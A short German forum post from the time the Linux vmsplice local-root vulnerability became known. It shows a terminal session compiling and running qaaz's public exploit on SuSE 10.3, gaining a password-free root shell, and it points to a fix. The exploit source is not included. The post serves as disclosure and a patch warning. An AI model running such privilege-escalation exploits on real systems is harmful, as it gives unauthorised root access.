Seit etwa 17 Std. ist eine Sicherheitsluecke im Linux-Kernel bekannt:

[Links nur für registrierte Nutzer]

Der bug ist nur fuer Debian geloggt - ist aber fuer alle Kernel, einschliesslich 2.6.24 gueltig (Test auf SuSE 10.3):

Code:
~/TempInstall/BugKernel.11.02.08> vi exploid.c
~/TempInstall/BugKernel.11.02.08> gcc exploid.c -o exploid
~/TempInstall/BugKernel.11.02.08> ./exploid
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dcc000 .. 0xb7dfe000
[+] root
~/TempInstall/BugKernel.11.02.08 #
Upppsss ... root-Shell ohne Passwort!

Um diese Sicherheitsluecke zu schliessen:

[Links nur für registrierte Nutzer]